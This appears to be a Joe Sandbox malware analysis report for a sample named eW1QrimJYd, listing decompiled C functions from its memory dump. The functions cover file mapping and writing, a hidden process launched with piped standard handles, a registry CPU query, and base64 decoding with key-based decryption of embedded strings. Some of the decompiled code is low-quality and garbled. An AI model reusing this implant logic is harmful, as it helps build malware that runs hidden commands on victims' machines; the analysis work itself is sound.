Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 936ba0e9cb342e9db3c7f4a42139b9ef20a29dac27ffd91b6f2114a2327831a2
Instruction ID: 489860e8cef0a88a34f49a7a80cf7075c84828c3924745d6caad779d47e5f7dd
Opcode Fuzzy Hash: 936ba0e9cb342e9db3c7f4a42139b9ef20a29dac27ffd91b6f2114a2327831a2
Instruction Fuzzy Hash: 7621E230244B04AAE7766B15DC4AF59B2E1BB40B05F354938F2C1344F08BF5B899DF04

Uniqueness

Uniqueness Score: -1.00%

Function 00A82890 Relevance: 12.1, APIs: 8, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00A82890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t9;
				signed int _t14;
				void* _t18;
				void* _t19;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t24;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t9 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t34 = _t9;
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E00A83030(0, _t34, _t35); // executed
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E00A83030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0); // executed
					_v16 = _t18;
					if(_t18 != 0) {
						_t19 = MapViewOfFile(_t18, _t37, 0, 0, 0); // executed
						_t38 = _t19;
						if(_t38 != 0) {
							_t23 = E00A83030(0, _t34, _t38); // executed
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6, executed
								E00A87DB0(_t29, _t5); // executed
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t24 = E00A82830(_v12, _t38, _v8); // executed
							_t28 = _t24;
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}

0x00a82890
0x00a82899
0x00a8289b
0x00a828ab
0x00a828b1
0x00a828b6
0x00a828f9
0x00a82901
0x00a828b8
0x00a828c0
0x00a828c3
0x00a828ca
0x00a828cf
0x00a828d0
0x00a828d8
0x00a828e5
0x00a828eb
0x00a828f0
0x00a8290a
0x00a82910
0x00a82914
0x00a82916
0x00a8291d
0x00a8291f
0x00a82920
0x00a82920
0x00a82923
0x00a82926
0x00a8292b
0x00a8292b
0x00a8292e
0x00a82937
0x00a8293f
0x00a82942
0x00a82942
0x00a82951
0x00a82954
0x00a8295e
0x00a828f2
0x00a828f3
0x00000000
0x00a828f3
0x00a828f0

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,746982B0,00000000,?,?,00A82C02), ref: 00A828AB
GetFileSize.KERNEL32(00000000,00000000,?,?,00A82C02), ref: 00A828BA
CreateFileMappingW.KERNELBASE(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,00A82C02), ref: 00A828E5
CloseHandle.KERNEL32(00000000,?,?,00A82C02), ref: 00A828F3
MapViewOfFile.KERNEL32(00000000,746982B1,00000000,00000000,00000000,?,?,00A82C02), ref: 00A8290A
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,00A82C02), ref: 00A82942
CloseHandle.KERNEL32(?,?,?,00A82C02), ref: 00A82951
CloseHandle.KERNEL32(00000000,?,?,00A82C02), ref: 00A82954

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateView$MappingSizeUnmap
String ID:
API String ID: 265113797-0
Opcode ID: 4eb106900641ee2c850efab1eec0517be50a0fb09c78b757c9fcac797955541d
Instruction ID: f07002bbb55260736ea80cf85d0b233d4277f2b53944ea70ca017f1913fb4975
Opcode Fuzzy Hash: 4eb106900641ee2c850efab1eec0517be50a0fb09c78b757c9fcac797955541d
Instruction Fuzzy Hash: 8321F672A111197FEB11B7B49C8EF7F776CEB45765F140265FC05E2280E6349D0247A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A84B10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
processCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00A84B10(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				int _t20;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E00A88B30( &_v92, 0, 0x44);
				_t15 =  *0xa92b0c; // 0x2f4
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0xa92b08; // 0x88c
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				_t20 = CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20); // executed
				if(_t20 != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}

0x00a84b1c
0x00a84b22
0x00a84b24
0x00a84b29
0x00a84b2e
0x00a84b36
0x00a84b39
0x00a84b3c
0x00a84b41
0x00a84b48
0x00a84b4d
0x00a84b58
0x00a84b6f
0x00a84b77
0x00a84b8d
0x00a84b98
0x00a84b79
0x00a84b83
0x00a84b83

APIs

_memset.LIBCMT ref: 00A84B29
CreateProcessW.KERNEL32 ref: 00A84B6F
GetLastError.KERNEL32(?,?,00000000), ref: 00A84B79
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00A84B8D
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00A84B92

Strings

D, xrefs: 00A84B58

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: D
API String ID: 1393943095-2746444292
Opcode ID: fabeea1dd9c63480d8c744fef1e4e850b9d7fd94b2c1633311705b2af57f309d
Instruction ID: 8489f6f5d2ca90f5c6f656b1cc0426684dbace2c4e4cacc2fd5c8aa07f5c06b4
Opcode Fuzzy Hash: fabeea1dd9c63480d8c744fef1e4e850b9d7fd94b2c1633311705b2af57f309d
Instruction Fuzzy Hash: C9014471E40319ABDB11DFE4DC46BEE7BB8EF08710F104216F608B6190E7B155548B94

Uniqueness

Uniqueness Score: -1.00%

Function 00A86D10 Relevance: 7.5, APIs: 5, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A86D10(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}

0x00a86d26
0x00a86d30
0x00a86d84
0x00a86d32
0x00a86d35
0x00a86d47
0x00a86d4f
0x00a86d66
0x00a86d6f
0x00a86d7b
0x00a86d51
0x00a86d54
0x00a86d57
0x00a86d63
0x00a86d63
0x00a86d4f

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,00000000,?,00A8726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00A86D26
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000080,?,?,00A8726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00A86D47
RegCloseKey.KERNEL32(?,?,00A8726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00A86D57
GetLastError.KERNEL32(?,00A8726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00A86D66
RegCloseKey.ADVAPI32(?,?,00A8726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00A86D6F

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: Close$ErrorLastOpenQueryValue
String ID:
API String ID: 2437438455-0
Opcode ID: 4cd4695ed27e20d6d186b67285a15ee1f52e2279d45db77a24b160dde0372baa
Instruction ID: ab49630694b90e41f43cd40d62d297cb3a6919d2f8f1d8617f82a9dedfb789cd
Opcode Fuzzy Hash: 4cd4695ed27e20d6d186b67285a15ee1f52e2279d45db77a24b160dde0372baa
Instruction Fuzzy Hash: 5A01087260011CABDB21DF94ED099EA7B7CEB08351B004162FD0596120D7329A21ABE0

Uniqueness

Uniqueness Score: -1.00%

Function 00A82806 Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E00A82806(void* __eax, void* __ebx, signed char __ecx, void* __edx, intOrPtr __edi) {
				void* _t9;
				int _t13;
				void* _t15;
				void* _t16;
				signed char _t18;
				void* _t20;
				void* _t22;
				struct _OVERLAPPED* _t24;
				intOrPtr _t26;
				void* _t28;

				_t20 = __edx;
				_t18 = __ecx;
				_t15 = __ebx;
				_pop(_t26);
				if(__eax + 0x89 == 0) {
					 *((intOrPtr*)(_t26 + 0xc)) = __edi;
					_t26 =  *((intOrPtr*)(_t28 + 0x10));
				}
				asm("adc [ebx-0x74f3dba4], cl");
				if(0 == 0) {
					_t16 = _t20; // executed
					_t9 = CreateFileW(_t18 +  *_t20, 0x40000000, 0, ??, ??, ??, ??); // executed
					_t22 = _t9;
					_t24 = 0;
					if(_t22 != 0xffffffff) {
						if(_t16 == 0) {
							L7:
							_t24 = 1;
						} else {
							_t13 = WriteFile(_t22, _t16,  *(_t26 + 8), _t26 - 4, 0); // executed
							if(_t13 != 0) {
								goto L7;
							}
						}
						FindCloseChangeNotification(_t22); // executed
					}
					return _t24;
				} else {
					 *(_t15 - 0x7cfbdb84) =  *(_t15 - 0x7cfbdb84) | _t18;
					asm("les edx, [ebx+eax*8]");
				}
			}

0x00a82806
0x00a82806
0x00a82806
0x00a82806
0x00a82809
0x00a8280b
0x00a82810
0x00a82810
0x00a82813
0x00a82819
0x00a8284a
0x00a8284c
0x00a82852
0x00a82854
0x00a82859
0x00a8285d
0x00a82873
0x00a82873
0x00a8285f
0x00a82869
0x00a82871
0x00000000
0x00000000
0x00a82871
0x00a82879
0x00a82879
0x00a82887
0x00a8281b
0x00a8281b
0x00a82821
0x00a82821

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf1cb6c247d994635b3762a41492f98160033318273399798a75b97824853eb8
Instruction ID: b51e6a53813b95d535e46cee31898742927270de38dd8fe55b0e4631e57a55f6
Opcode Fuzzy Hash: bf1cb6c247d994635b3762a41492f98160033318273399798a75b97824853eb8
Instruction Fuzzy Hash: 1A01A7326042046BCF20DFA89C887BBB799EB95320F0886A9FD5897151C331DD169B91

Uniqueness

Uniqueness Score: -1.00%

Function 00A82830 Relevance: 4.5, APIs: 3, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00A82830(void* __ecx, void* __edx, long _a4) {
				long _v8;
				void* _t3;
				int _t7;
				void* _t9;
				void* _t15;
				struct _OVERLAPPED* _t18;

				_push(__ecx);
				_push(0);
				_push(0x80);
				_push(2);
				_t9 = __edx; // executed
				_t3 = CreateFileW(__ecx +  *((intOrPtr*)(__edx)), 0x40000000, 0, ??, ??, ??, ??); // executed
				_t15 = _t3;
				_t18 = 0;
				if(_t15 != 0xffffffff) {
					if(_t9 == 0) {
						L4:
						_t18 = 1;
					} else {
						_t7 = WriteFile(_t15, _t9, _a4,  &_v8, 0); // executed
						if(_t7 != 0) {
							goto L4;
						}
					}
					FindCloseChangeNotification(_t15); // executed
				}
				return _t18;
			}

0x00a82833
0x00a82837
0x00a82839
0x00a8283e
0x00a8284a
0x00a8284c
0x00a82852
0x00a82854
0x00a82859
0x00a8285d
0x00a82873
0x00a82873
0x00a8285f
0x00a82869
0x00a82871
0x00000000
0x00000000
0x00a82871
0x00a82879
0x00a82879
0x00a82887

APIs

CreateFileW.KERNEL32(00A82C02,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000000,00A82C02,?,00A8293C,?), ref: 00A8284C
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,00A8293C,?,?,?,?,00A82C02), ref: 00A82869
FindCloseChangeNotification.KERNEL32(00000000,?,00A8293C,?,?,?,?,00A82C02), ref: 00A82879

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateFindNotificationWrite
String ID:
API String ID: 3805958096-0
Opcode ID: 6aced95fbdd9a56473c3c6f7cceeb879ea2885055ea41bfad0d4e028c1675929
Instruction ID: 1754c76964955c0791d3d791fab83069780487b95a3972cbd88956af0a959fda
Opcode Fuzzy Hash: 6aced95fbdd9a56473c3c6f7cceeb879ea2885055ea41bfad0d4e028c1675929
Instruction Fuzzy Hash: 55F0A7727402147BEA305BD5AC8DF7BB65CD786B60F144225FE08E61D0D6A19C0243A4

Uniqueness

Uniqueness Score: -1.00%

Function 00A84CB0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A84CB0(void* __ebx, CHAR* __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				CHAR* _v12;
				long _v16;
				void _v4112;
				char* _t18;
				char* _t21;
				intOrPtr _t24;
				char _t26;
				void* _t31;
				void* _t33;
				void* _t38;

				E00A884B0(0x100c);
				_v8 = __edx;
				_v12 = __ecx;
				while(1) {
					L1:
					_t18 = ReadFile( *0xa92b10,  &_v4112, 0x1000,  &_v16, 0); // executed
					_t24 = _v4112;
					_t33 =  &_v4112;
					_t21 = _t18;
					if(_t24 == 0) {
						break;
					}
					_t38 = _t33 - "Can\'t find server";
					do {
						_t18 = "Can\'t find server";
						if(_t24 == 0) {
							goto L9;
						} else {
							while(1) {
								_t26 =  *_t18;
								if(_t26 == 0) {
									goto L1;
								}
								_t31 =  *((char*)(_t38 + _t18)) - _t26;
								if(_t31 != 0) {
									L8:
									if( *_t18 == 0) {
										goto L1;
									} else {
										goto L9;
									}
								} else {
									_t18 =  &(_t18[1]);
									if( *((intOrPtr*)(_t38 + _t18)) != _t31) {
										continue;
									} else {
										goto L8;
									}
								}
								goto L10;
							}
							goto L1;
						}
						goto L10;
						L9:
						_t24 =  *((intOrPtr*)(_t33 + 1));
						_t33 = _t33 + 1;
						_t38 = _t38 + 1;
					} while (_t24 != 0);
					break;
				}
				L10:
				if(_t21 != 0 && _v16 != 0) {
					return E00A84BA0( &_v4112, _v12, _v8);
				}
				return _t18;
			}

0x00a84cb8
0x00a84cbf
0x00a84cc2
0x00a84cc6
0x00a84cc6
0x00a84cde
0x00a84ce4
0x00a84cea
0x00a84cf0
0x00a84cf4
0x00000000
0x00000000
0x00a84cf8
0x00a84d00
0x00a84d00
0x00a84d07
0x00000000
0x00a84d10
0x00a84d10
0x00a84d10
0x00a84d14
0x00000000
0x00000000
0x00a84d1d
0x00a84d1f
0x00a84d27
0x00a84d2a
0x00000000
0x00000000
0x00000000
0x00000000
0x00a84d21
0x00a84d21
0x00a84d25
0x00000000
0x00000000
0x00000000
0x00000000
0x00a84d25
0x00000000
0x00a84d1f
0x00000000
0x00a84d10
0x00000000
0x00a84d2c
0x00a84d2c
0x00a84d2f
0x00a84d30
0x00a84d31
0x00000000
0x00a84d00
0x00a84d35
0x00a84d3a
0x00000000
0x00a84d53
0x00a84d59

APIs

ReadFile.KERNEL32(?,00001000,00000000,00000000,00000000,00000000,00000000,?,00A84E7E), ref: 00A84CDE

Strings

Can't find server, xrefs: 00A84CF8, 00A84D00

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: Can't find server
API String ID: 2738559852-1141070784
Opcode ID: a129a2119c824a55ba3a629a423b4db2bf9885363fa7ed9cf90e9a9789d873db
Instruction ID: 435e361bcce1e9cbdeee4c291995836747f322514528c99edd81106d4d61bacc
Opcode Fuzzy Hash: a129a2119c824a55ba3a629a423b4db2bf9885363fa7ed9cf90e9a9789d873db
Instruction Fuzzy Hash: EB113A34D0429BAFEB22EB509A507FABBB8DF4E306F1481E5DD8457210E6B01D45C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A85EF0 Relevance: 2.5, APIs: 2, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00A85EF0(void** __ecx) {
				void** _v8;
				void* _t19;
				void* _t20;
				void* _t24;

				_push(__ecx);
				_v8 = __ecx;
				_t19 = VirtualAlloc(0, 0x123, 0x3000, 4); // executed
				_v8[1] = _t19;
				_t20 = VirtualAlloc(0, 0x515, 0x3000, 4); // executed
				 *_v8 = _t20;
				_v8[3] = 0x123;
				_v8[2] = 0x515;
				_t13 =  &(_v8[1]); // 0xc7000000
				_t24 = E00A85D80( *_t13,  &(_v8[3]),  *_v8,  &(_v8[2])); // executed
				if(_t24 == 0) {
					_v8[4] = 1;
				}
				_v8[4] = 0;
				return _v8;
			}

0x00a85ef3
0x00a85ef4
0x00a85f05
0x00a85f0e
0x00a85f1f
0x00a85f28
0x00a85f2d
0x00a85f37
0x00a85f55
0x00a85f59
0x00a85f63
0x00a85f68
0x00a85f68
0x00a85f72
0x00a85f7f

APIs

VirtualAlloc.KERNEL32(00000000,00000123,00003000,00000004,?,?,00A8491E), ref: 00A85F05
VirtualAlloc.KERNEL32(00000000,00000515,00003000,00000004,?,00A8491E), ref: 00A85F1F

Part of subcall function 00A85D80: CryptAcquireContextW.ADVAPI32(00A8491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,00A84916,?,00A8491E), ref: 00A85D95
Part of subcall function 00A85D80: GetLastError.KERNEL32(?,00A8491E), ref: 00A85D9F
Part of subcall function 00A85D80: CryptAcquireContextW.ADVAPI32(00A8491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00A8491E), ref: 00A85DBB

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: AcquireAllocContextCryptVirtual$ErrorLast
String ID:
API String ID: 3824161113-0
Opcode ID: d150498ccc2f939feb568fd003bfd2448a35668163f29438773a16e436a69baa
Instruction ID: 2877adc1163b0861cd9ba49c5a7cffb985c5644bf2fe11918df78eb571b336d4
Opcode Fuzzy Hash: d150498ccc2f939feb568fd003bfd2448a35668163f29438773a16e436a69baa
Instruction Fuzzy Hash: 03111B74A40208EFD704DF94CA49F9AB7F5EF88705F248188E904AB381D7B5AF019B40

Uniqueness

Uniqueness Score: -1.00%

Function 00A84AF0 Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t2;

				E00A848A0(_t2); // executed
				ExitProcess(0);
			}

0x00a84af3
0x00a84afa

APIs

Part of subcall function 00A848A0: Sleep.KERNEL32(000003E8), ref: 00A848AB
Part of subcall function 00A848A0: ExitProcess.KERNEL32 ref: 00A848BC

ExitProcess.KERNEL32 ref: 00A84AFA

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: ExitProcess$Sleep
String ID:
API String ID: 1320946285-0
Opcode ID: a2576a9f29d50f8a27557cc4c62d29506c71ef100e7c8086d9e2ff6dd24426f9
Instruction ID: e92310c03a41157e5d1dc51a879be5162bb479c74b8d7dc2ae738ee12fa5804f
Opcode Fuzzy Hash: a2576a9f29d50f8a27557cc4c62d29506c71ef100e7c8086d9e2ff6dd24426f9
Instruction Fuzzy Hash: 2DA0023054C74A5FD1C1BBE5AD4FB5B765C5B05B02FC40160B709951927DD4744187AB

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A85050 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 191
memorystringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00A85050(CHAR* __ecx, CHAR** __edx) {
				int _v8;
				CHAR* _v12;
				int _v16;
				char _v18;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				void* _v36;
				CHAR** _v40;
				void* _v44;
				char _v299;
				char _v300;
				void* _v356;
				void* _v360;
				int _t55;
				int _t56;
				BYTE* _t57;
				int _t59;
				void* _t63;
				void* _t64;
				char _t65;
				void* _t77;
				signed int _t79;
				signed int _t81;
				int _t82;
				int _t85;
				char _t87;
				CHAR* _t95;
				int _t97;
				char* _t98;
				void* _t107;
				void* _t108;
				signed char _t109;
				short* _t111;
				WCHAR* _t116;
				CHAR* _t117;
				BYTE* _t124;
				WCHAR* _t125;
				WCHAR* _t126;
				void* _t127;
				long _t128;
				char* _t129;
				int _t130;
				void* _t131;
				CHAR* _t132;
				void* _t133;
				long _t134;
				char* _t135;

				_v40 = __edx;
				_v12 = __ecx;
				_t55 = lstrlenA(__ecx);
				_t107 = VirtualAlloc;
				_t56 = _t55 + 1;
				_v16 = _t56;
				_t4 = _t56 + 1; // 0x2
				_t128 = _t4;
				_t57 = VirtualAlloc(0, _t128, 0x3000, 0x40);
				_v44 = _t57;
				if(_t57 == 0 || _v16 >= _t128) {
					_t124 = 0;
					__eflags = 0;
				} else {
					_t124 = _t57;
				}
				_t129 = 0;
				_t59 = CryptStringToBinaryA(_v12, 0, 1, _t124,  &_v16, 0, 0);
				_t144 = _t59;
				if(_t59 == 0) {
					GetLastError();
					goto L26;
				} else {
					_t63 = "#shasj"; // 0x61687323
					asm("movq xmm0, [0xa90128]");
					_t130 = _v16;
					_v24 = _t63;
					_t64 =  *0xa90134; // 0x6a73
					_v20 = _t64;
					_t65 =  *0xa90136; // 0x0
					_v18 = _t65;
					asm("movq [ebp-0x1c], xmm0");
					_v300 = 0;
					E00A88B30( &_v299, 0, 0xff);
					E00A85C40( &_v300,  &_v32, lstrlenA( &_v32));
					E00A85CF0( &_v300, _t124, _t130);
					_t116 =  &_v32;
					asm("xorps xmm0, xmm0");
					asm("movdqu [ebp-0x1c], xmm0");
					E00A833E0(_t116, _t144, _t124);
					if(_v32 != 0) {
						E00A84FD0();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t107);
						_push(_t130);
						_push(_t124);
						_t125 = _t116;
						_t131 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
						_v360 = _t131;
						GetModuleFileNameW(0, _t131, 0x200);
						_t108 = CreateFileW(_t131, 0x80000000, 1, 0, 3, 0x80, 0);
						_v356 = _t108;
						__eflags = _t108 - 0xffffffff;
						if(_t108 != 0xffffffff) {
							_t77 = CreateFileMappingW(_t108, 0, 8, 0, 0, 0);
							_v28 = _t77;
							__eflags = _t77;
							if(_t77 != 0) {
								_t79 = MapViewOfFile(_t77, 1, 0, 0, 0);
								_v16 = _t79;
								__eflags = _t79;
								if(_t79 != 0) {
									_t41 = _t79 + 0x4e; // 0x4e
									_t132 = _t41;
									_v12 = _t132;
									_t81 = lstrlenW(_t125);
									_t109 = 0;
									_t126 =  &(_t125[_t81]);
									_t82 = lstrlenA(_t132);
									__eflags = _t82 + _t82;
									if(_t82 + _t82 != 0) {
										_t117 = _t132;
										do {
											__eflags = _t109 & 0x00000001;
											if((_t109 & 0x00000001) != 0) {
												 *((char*)(_t126 + _t109)) = 0;
											} else {
												_t87 =  *_t132;
												_t132 =  &(_t132[1]);
												 *((char*)(_t126 + _t109)) = _t87;
											}
											_t109 = _t109 + 1;
											_t85 = lstrlenA(_t117);
											_t117 = _v12;
											__eflags = _t109 - _t85 + _t85;
										} while (_t109 < _t85 + _t85);
									}
									UnmapViewOfFile(_v16);
									_t108 = _v20;
									_t131 = _v24;
								}
								CloseHandle(_v28);
							}
							CloseHandle(_t108);
						}
						return VirtualFree(_t131, 0, 0x8000);
					} else {
						_t127 = _v28;
						_v12 = 1;
						if(_t127 != 0) {
							_t97 = lstrlenA(_t127);
							_v8 = _t97;
							_t24 = _t97 + 1; // 0x1
							_t134 = _t24;
							_t98 = VirtualAlloc(0, _t134, 0x3000, 0x40);
							_v36 = _t98;
							if(_t98 == 0 || _v8 >= _t134) {
								_t135 = 0;
								__eflags = 0;
							} else {
								_t135 = _t98;
							}
							if(CryptStringToBinaryA(_t127, 0, 1, _t135,  &_v8, 0, 0) != 0) {
								_t111 = VirtualAlloc(0, 2 + _v8 * 2, 0x3000, 4);
								if(_t111 != 0) {
									if(MultiByteToWideChar(0xfde9, 0, _t135, 0xffffffff, _t111, _v8 + 1) <= 0) {
										GetLastError();
									} else {
										 *0xa92b00 = _t111;
									}
								}
